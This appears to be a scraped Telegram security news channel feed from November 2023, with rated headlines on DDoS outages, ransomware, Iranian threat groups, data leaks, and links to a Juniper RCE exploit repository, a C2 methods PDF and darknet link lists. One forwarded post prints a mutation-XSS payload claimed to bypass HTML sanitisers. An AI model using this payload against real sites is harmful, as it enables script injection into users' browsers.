■■■■□ Signal tests usernames that keep your phone number private.
https://www.bleepingcomputer.com/news/software/signal-tests-usernames-that-keep-your-phone-number-private/
https://www.bleepingcomputer.com/news/software/signal-tests-usernames-that-keep-your-phone-number-private/
BleepingComputer
Signal tests usernames that keep your phone number private
Signal is now testing public usernames that allow users to conceal the phone numbers linked to their accounts while communicating with others.
■■■■□ Cloudflare goes down as their website is downed by a DDoS attack claimed by Anonymous Sudan.
https://www.bleepingcomputer.com/news/technology/cloudflare-website-downed-by-ddos-attack-claimed-by-anonymous-sudan/
https://www.bleepingcomputer.com/news/technology/cloudflare-website-downed-by-ddos-attack-claimed-by-anonymous-sudan/
BleepingComputer
Cloudflare website downed by DDoS attack claimed by Anonymous Sudan
Cloudflare is investigating an ongoing outage causing 'We're sorry" Google errors to be shown on the company's website.
■■■■□ Palestine-Israel Cyber-War update!
Iranian nation-state actors have been observed using a previously undocumented command-and-control (C2) framework called MuddyC2Go as part of attacks targeting Israel.
https://thehackernews.com/2023/11/muddyc2go-new-c2-framework-iranian.html
Iranian nation-state actors have been observed using a previously undocumented command-and-control (C2) framework called MuddyC2Go as part of attacks targeting Israel.
https://thehackernews.com/2023/11/muddyc2go-new-c2-framework-iranian.html
■■■□□ ICBC bank 🏦 hot by ransomware.
https://economictimes.indiatimes.com/news/international/business/worlds-largest-bank-hit-by-ransomware-gang-linked-to-boeing-ion-attacks/articleshow/105108137.cms
https://economictimes.indiatimes.com/news/international/business/worlds-largest-bank-hit-by-ransomware-gang-linked-to-boeing-ion-attacks/articleshow/105108137.cms
The Economic Times
World's largest bank hit by ransomware gang linked to Boeing, Ion attacks
The prolific gang known as Lockbit is suspected to have orchestrated a ransomware attack against the US unit of ICBC, the worlds largest lender by assets, according to people familiar with the situation, who asked not to be identified because the information…
Forwarded from cKure Red
Zero-Day: Universal MXSS.
Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.
Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.
<svg>
<title>
<title>
<image href="</title><iframe onload=alert(1)>">
</title>
</title>
</svg>■□□□□ OpenAI confirms DDoS attacks behind ongoing ChatGPT outages.
https://www.bleepingcomputer.com/news/security/openai-confirms-ddos-attacks-behind-ongoing-chatgpt-outages/
https://www.bleepingcomputer.com/news/security/openai-confirms-ddos-attacks-behind-ongoing-chatgpt-outages/
BleepingComputer
OpenAI confirms DDoS attacks behind ongoing ChatGPT outages
During the last 24 hours, OpenAI has been addressing what it describes as "periodic outages" linked to DDoS attacks affecting its API and ChatGPT services.
■■■□□ Iran-Linked Imperial Kitten Cyber Group Targeting Middle East's Tech Sectors.
https://thehackernews.com/2023/11/iran-linked-imperial-kitten-cyber-group.html
https://thehackernews.com/2023/11/iran-linked-imperial-kitten-cyber-group.html
Forwarded from cKure Red
This media is not supported in your browser
VIEW IN TELEGRAM
Anonymous (Hacktivist group) sends a message to the Israeli leader and government amid ongoing attack on children of Palestine.
Story; part of Israel-Palestine Cyber-War.
https://youtu.be/BGcHzs9LKQE
Story; part of Israel-Palestine Cyber-War.
https://youtu.be/BGcHzs9LKQE
■■■■□ Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects.
https://github.com/RapidDNS/Afuzz
https://github.com/RapidDNS/Afuzz
GitHub
GitHub - RapidDNS/Afuzz: Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.
Afuzz is an automated web path fuzzing tool for the Bug Bounty projects. - RapidDNS/Afuzz
■■■□□ Australian Ports Cyber Incident ‘Serious & Ongoing’, Says Govt.
The cyber incident that struck several major Australian ports late Friday evening is still unresolved according to government officials, and is likely to continue “for a number of days”.
DP World Australia, which operates major ports in Sydney, Melbourne, Brisbane and Fremantle, handling about half the goods that move in and out of the country, is investigating the breach but refused to give a timeline on the resumption of normal service.
The cyber incident that struck several major Australian ports late Friday evening is still unresolved according to government officials, and is likely to continue “for a number of days”.
DP World Australia, which operates major ports in Sydney, Melbourne, Brisbane and Fremantle, handling about half the goods that move in and out of the country, is investigating the breach but refused to give a timeline on the resumption of normal service.
■■□□□ Data-Leak from United States: MOVEit global security incident compromising 1.3 million records of entire state's population.
Information for Maine Residents and Impacted Individuals.
https://www.maine.gov/moveit-global-data-security-incident/
https://mashable.com/article/maine-moveit-ransomware-attack
Information for Maine Residents and Impacted Individuals.
https://www.maine.gov/moveit-global-data-security-incident/
https://mashable.com/article/maine-moveit-ransomware-attack
■■■■□ Zero-Day: CVE-2023-36845 represents a notable PHP environment variable manipulation vulnerability that impacts Juniper SRX firewalls and EX switches. While Juniper has categorized this vulnerability as being of medium severity, in this article, we will elucidate how this singular vulnerability can be leveraged for remote, unauthenticated code execution.
https://github.com/kljunowsky/CVE-2023-36845
https://github.com/kljunowsky/CVE-2023-36845
GitHub
GitHub - kljunowsky/CVE-2023-36845: Juniper Firewalls CVE-2023-36845 - RCE
Juniper Firewalls CVE-2023-36845 - RCE. Contribute to kljunowsky/CVE-2023-36845 development by creating an account on GitHub.
20231113_004030.jpg
43.1 KB
■■■■□ An unknown Threat Actor(s) claim to have compromised Coin Cloud.
They allege to have exfiltrated 70,000 customer selfies (via ATM cameras), and 300,000 customers PII which includes Social Security Number, Date of Birth, First Name, Last Name, e-mail address, Telephone Number, Current Occupation, Physical Address, and more. They allege to have data for individuals residing in the United States as well as Brazil.
They also claim to have stolen the source code to the entire backend of Coin Cloud.
Coin Cloud filed for Chapter 11 Bankruptcy in February, 2023.
They allege to have exfiltrated 70,000 customer selfies (via ATM cameras), and 300,000 customers PII which includes Social Security Number, Date of Birth, First Name, Last Name, e-mail address, Telephone Number, Current Occupation, Physical Address, and more. They allege to have data for individuals residing in the United States as well as Brazil.
They also claim to have stolen the source code to the entire backend of Coin Cloud.
Coin Cloud filed for Chapter 11 Bankruptcy in February, 2023.
Source: VX-Underground | 𝕏■■■■□ Israel-Palestine Cyber-War update!
Iranian hackers launch malware attacks on Israel’s tech sector.
https://www.bleepingcomputer.com/news/security/iranian-hackers-launch-malware-attacks-on-israels-tech-sector/
Iranian hackers launch malware attacks on Israel’s tech sector.
https://www.bleepingcomputer.com/news/security/iranian-hackers-launch-malware-attacks-on-israels-tech-sector/
BleepingComputer
Iranian hackers launch malware attacks on Israel’s tech sector
Security researchers have tracked a new campaign from Imperial Kitten targeting transportation, logistics, and technology firms.
Forwarded from cKure Red
Top_C_C_Methods_1699929574.pdf
8.1 MB
● Command and control methods with details.
■■■■□ Tor / Darknet Links: Every website added to our repository has been verified as legitimate by an independent staff of Internet journalists from #DeepOnionWeb. Beware of unverified links that may lead to scams. DeepOnionWeb is one of the oldest and most reputable darknet news and links portals, used by thousands of people every day to safely access the darknet.
https://github.com/DeepWebOnion/darkweb-links
https://github.com/DeepWebOnion/darkweb-links